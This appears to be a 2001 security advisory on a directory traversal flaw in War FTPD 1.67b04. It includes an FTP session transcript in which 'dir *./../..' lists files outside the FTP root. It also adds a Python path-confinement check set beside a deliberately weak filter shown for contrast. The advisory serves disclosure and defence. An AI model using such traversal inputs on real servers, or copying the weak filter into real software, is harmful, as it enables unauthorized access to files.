War FTPD Win32 1.67b04 Allows Directory Traversal

Reported March 6, 2001, by [email protected].

VERSION AFFECTED

  • Jgaa’s Internet WarFTPD Win32 1.67b04

DESCRIPTION

A vulnerability exists that lets an attacker break out of the FTP root by using relative paths. For example, by connecting to a vulnerable host and issuing the command “dir *./../..”, an attacker can list the contents of the directory one level up from the FTP root directory.

DEMONSTRATION

[email protected] provided the following proof-of-concept scenario:

 

Verbindung mit 10.17.3.44 wurde hergestellt.
220- Jgaa's Fan Club FTP Service WAR-FTPD 1.67-04 Ready
220 Please enter your user name.
Benutzer (10.17.3.44:(none)): anonymous
331 User name okay. Give your full Email address as password.
Kennwort:
230 User logged in, proceed.
ftp> dir
200 Port command okay.
150 Opening ASCII NO-PRINT mode data connection for ls -l.
total 123
drwxrwxrwx 1 ftp ftp 0 Mar 2 12:17 test
-rwxrwxrwx 1 ftp ftp 6 Mar 2 12:33 movedtohomedir.txt
-rwxrwxrwx 1 ftp ftp 11 Mar 2 00:29 bisontest.txt
drwxrwxrwx 1 ftp ftp 0 Mar 3 15:59 HTTP
drwxrwxrwx 1 ftp ftp 0 Mar 3 17:05 huhu
drwxrwxrwx 1 ftp ftp 0 Mar 5 13:42 te
drwxrwxrwx 1 ftp ftp 0 Mar 5 13:42 ..te
226 Transfer finished successfully. Data connection closed.
FTP: 452 Bytes empfangen in 0,02Sekunden 22,60KB/s
ftp> cd ..
550 Permission denied.
ftp> dir *./../..
200 Port command okay.
150 Opening ASCII NO-PRINT mode data connection for ls *./../...
total 123
-rwxrwxrwx 1 ftp ftp 251658240 Mar 4 18:42 WIN386.SWP
drwxrwxrwx 1 ftp ftp 0 Jan 6 20:32 games
drwxrwxrwx 1 ftp ftp 0 Jan 7 19:58 HalfLife
226 Transfer finished successfully. Data connection closed.
FTP: 2977 Bytes empfangen in 0,07Sekunden 42,53KB/s
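
The transcript shows "cd .." refused while "dir *./../.." is accepted. The following added example (not part of the original advisory and not War FTPD code) shows a server-side check that confines every path argument to the FTP root by resolving it lexically before wildcard expansion, then re-checking the on-disk result. All function names are assumptions, and naive_filter is a hypothetical weak check included only for contrast.

```python
import os

class PathEscape(Exception):
    """A client-supplied path resolves outside the FTP root."""

def naive_filter(arg):
    # Hypothetical weak check (an assumption, not War FTPD's code):
    # it refuses only arguments that begin with "..".
    return not arg.replace("\\", "/").startswith("..")

def resolve_virtual(cwd, arg):
    """Resolve arg against the virtual cwd lexically, before any wildcard
    expansion or disk access; return a '/'-rooted virtual path."""
    arg = arg.replace("\\", "/")            # Win32 accepts both separators
    parts = [] if arg.startswith("/") else [p for p in cwd.split("/") if p]
    for comp in arg.split("/"):
        if comp in ("", "."):
            continue
        if comp == "..":
            if not parts:                   # would climb above the FTP root
                raise PathEscape(arg)
            parts.pop()
        elif set(comp) == {"."}:            # "..." and longer: refuse outright
            raise PathEscape(arg)
        else:
            parts.append(comp)              # "*." is just another component
    return "/" + "/".join(parts)

def to_real(ftp_root, cwd, arg):
    """Map the confined virtual path onto disk and re-check containment,
    which also catches links inside the root that point outside it."""
    root = os.path.realpath(ftp_root)
    virtual = resolve_virtual(cwd, arg)
    real = os.path.realpath(os.path.join(root, virtual.lstrip("/")))
    if os.path.commonpath([root, real]) != root:
        raise PathEscape(arg)
    return real

def is_confined(cwd, arg):
    """True when arg stays inside the FTP root, False when it escapes."""
    try:
        resolve_virtual(cwd, arg)
        return True
    except PathEscape:
        return False

if __name__ == "__main__":
    # Commands taken from the transcript above; cwd "/" is the FTP root.
    for arg in ("..", "*./../..", "test"):
        print(f"{arg!r}: naive={naive_filter(arg)} confined={is_confined('/', arg)}")
```

The same resolver should sit in front of every command that takes a path argument, so that listing and directory-change commands cannot disagree about what is inside the root.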

VENDOR RESPONSE

The vendor, Jgaa’s Internet, has released version 1.67b05 that corrects this issue. It is available at http://support.jgaa.com/index.php?cmd=DownloadVersion&ID=32.

CREDIT

Discovered by [email protected].

 
